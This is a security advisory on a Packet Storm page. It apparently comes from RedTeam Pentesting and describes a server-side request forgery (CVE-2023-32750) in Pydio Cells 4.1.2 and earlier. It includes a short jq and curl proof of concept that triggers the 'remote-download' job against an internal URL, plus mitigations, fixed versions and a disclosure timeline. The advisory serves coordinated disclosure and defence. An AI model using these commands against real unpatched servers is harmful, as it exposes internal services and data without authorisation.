what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Pydio Cells 4.1.2 Server-Side Request Forgery

Pydio Cells 4.1.2 Server-Side Request Forgery
Posted May 30, 2023
Site redteam-pentesting.de

Pydio Cells versions 4.1.2 and below suffer from a server-side request forgery vulnerability.

tags | exploit
advisories | CVE-2023-32750
SHA-256 | e80dc14f94f6e8fcaa9d6b4c38de47e89b02fbf48eec2911feee938e8da47d63

Pydio Cells 4.1.2 Server-Side Request Forgery

Change Mirror Download
For longer running processes, Pydio Cells allows for the creation of
jobs, which are run in the background. The job "remote-download" can be
used to cause the backend to send a HTTP GET request to a specified URL
and save the response to a new file. The response file is then available
in a user-specified folder in Pydio Cells.


Product: Pydio Cells
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005
Advisory Status: published
CVE: CVE-2023-32750
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750


"Pydio Cells is an open-core, self-hosted Document Sharing and
Collaboration platform (DSC) specifically designed for organizations
that need advanced document sharing and collaboration without security
trade-offs or compliance issues."

(from the vendor's homepage)

More Details

Using the REST-API of Pydio Cells it is possible to start jobs. For
example, when renaming a file or folder an HTTP request similar to the
following is sent:

PUT /a/jobs/user/move HTTP/2
Host: example.com
User-Agent: agent
Accept: application/json
Authorization: Bearer G4ZRN[...]
Content-Type: application/json
Content-Length: 140

"JobName": "move",
"JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}"

The body contains a JSON object with a job name and additional
parameters for the job. Besides the "move" job, also a job with the name
"remote-download" exists. It takes two additional parameters: "urls" and
"target". In the "urls" parameter, a list of URLs can be specified and in
the parameter "target" a path can be specified in which to save the
response. When the job is started, HTTP GET requests are sent from the
Pydio Cells server to the specified URLs. The responses are saved into a
file, which are uploaded to the specified folder within Pydio Cells.
Potential errors are transmitted in a WebSocket channel, which can be
opened through the "/ws/event" endpoint.

Proof of Concept

Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then,
run the following commands to start a "remote-download" job to trigger
an HTTP request:

$ export JWT="<insert JWT here>"

$ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \
| jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \
| tee remote-download.json

$ curl --header "Authorization: Bearer $JWT" \
--header 'Content-Type: application/json' \
--request PUT \
--data @remote-download.json 'https://example.com/a/jobs/user/remote-download'

The URL in the JSON document specifies which URL to request. The "target"
field in the same document specifies into which folder the response is saved.
Afterwards, the response is contained in a file in the specified folder.
Potential errors are communicated through the WebSocket channel.


Limit the services which can be reached by the Pydio Cells server, for
example using an outbound firewall.


Upgrade Pydio Cells to a version without the vulnerability.

Security Risk

The risk is highly dependent on the environment in which the attacked
Pydio Cells instance runs. If there are any internal HTTP services which
expose sensitive data on the same machine or within the same network,
the server-side request forgery vulnerability could pose a significant
risk. In other circumstances, the risk could be negligible. Therefore,
overall the vulnerability is rated as a medium risk.


2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released


RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Alter Posthof 1 Fax : +49 241 510081-99
52062 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By